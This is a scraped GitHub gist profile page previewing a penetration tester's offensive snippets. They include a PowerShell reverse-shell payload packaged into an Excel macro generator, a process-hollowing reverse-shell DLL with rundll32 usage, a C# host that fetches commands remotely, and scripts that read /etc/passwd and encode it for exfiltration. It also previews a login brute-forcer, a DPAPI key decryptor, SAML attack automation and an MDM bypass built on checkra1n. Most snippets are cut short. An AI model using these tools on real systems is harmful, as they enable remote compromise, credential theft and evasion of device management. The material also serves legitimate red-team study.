Skip to content

Instantly share code, notes, and snippets.


Frank Spierings FrankSpierings

View GitHub Profile
FrankSpierings / sql-query-ps-oneliner.ps1
Last active Jul 14, 2021
PowerShell Oneliner to perform database queries.
View sql-query-ps-oneliner.ps1
powershell "$sql='SELECT @@VERSION';$c=(New-Object -TypeName System.Data.SqlClient.SqlConnection('server=SERVER;Database=DATABASE;Integrated Security=True;'));$;$q=(New-Object System.Data.SqlClient.SqlCommand($sql,$c));$r=$q.ExecuteReader();$oo=@();while ($r.Read()){$o=(New-Object PSObject);for ($i=0;$i -lt $r.FieldCount;$i++){$n=$r.GetName($i);if($n -eq ''){$n='column_'+$i};$o|Add-Member -type NoteProperty -Name $n -Value $r[$i];}$oo+=$o};$oo|FT -Wrap"
View read-file-aesencrypt-base54.ps1
$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open);
$ms = New-Object System.IO.MemoryStream;
$aes = [System.Security.Cryptography.Aes]::Create();
$aes.keysize = 128;
Write-Host "Key: " (($aes.Key |% ToString X2) -join '');
Write-Host "IV: " (($aes.IV |% ToString X2) -join '');
Write-Host "Mode: " $aes.mode
$cs = New-Object System.Security.Cryptography.CryptoStream($ms, $aes.CreateEncryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write);
FrankSpierings / read-file-gzip-base64.ps1
Last active Jul 8, 2021
Read file, gzip and convert to base64.
View read-file-gzip-base64.ps1
$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open)
$ms = New-Object System.IO.MemoryStream;
$gzs = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Compress);
FrankSpierings /
Created Apr 30, 2021
Generate a XLSM macro from python
import codecs
import base64
data = '''$lhost="";
$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport);
$stream = $client.GetStream();
FrankSpierings / pshost.cs
Created Apr 29, 2021
PowerShell Host example. Obtaining its commands from a remote location.
View pshost.cs
// c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe pshost.cs /r:c:\Windows\assembly\GAC_MSIL\System.Management.Automation\\System.Management.Automation.dll
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using PowerShell = System.Management.Automation.PowerShell;
internal class InfantAnnihilator
private static void Main(string[] args)
FrankSpierings /
Last active Apr 25, 2021
Decrypt Protect file using PVK Domain key
# Referenced sources:
# - Mimikatz
# -
# -
from io import BytesIO
import struct
import math
import codecs
from Crypto.PublicKey import RSA
FrankSpierings /
Created Mar 16, 2021
Brutus - Brute-force login on a Xelion system using their own classes.
- Get the .jar files from the server (check .jnlp file).
- Extract those .jar files (unzip).
- Place in the same directory.
- Compile using the JDK: "c:\Program Files\Java\jdk-16\bin\javac.exe" -target 1.7 -source 1.7
- Notice the target & source. Otherwise CORBA can't be found.
- Run: java Brutus <accountname> <ascii password file> <target>
- Example: java Brutus beheerder passwords.txt xelion.local
FrankSpierings /
Created Feb 25, 2021
SAMLRaider in Python, useful to automate (new) logins and the automatic exploit checks.
import xml.dom.minidom as minidom
# Constants
class SAMLRaider():
def __init__(self, match_replace_map: dict = None):
"""SAMLRainder object
FrankSpierings / README.MD
Last active May 31, 2021
Apple Device Enrollment Program (DEP) - ByPass MDM Policy using Checkra1n exploit


  • Install a socket daemon to multiplex connections from and to iOS devices, run: brew install usbmuxd
  • Start the socket daemon iproxy 2222 44
  • Install checkra1n exploit locally, run: brew install checkra1n
  • When SSH password authentication is requested, use: alpline.

Wipe iPad and restore Firmware

FrankSpierings / process-hollow-shell-dll.c
Last active Jul 25, 2021
Reverse shell which uses process hollowing technique
View process-hollow-shell-dll.c
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
// Run:
// rundll32 process-hollow-shell.dll,main 4444
// rundll32 process-hollow-shell.dll,main 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe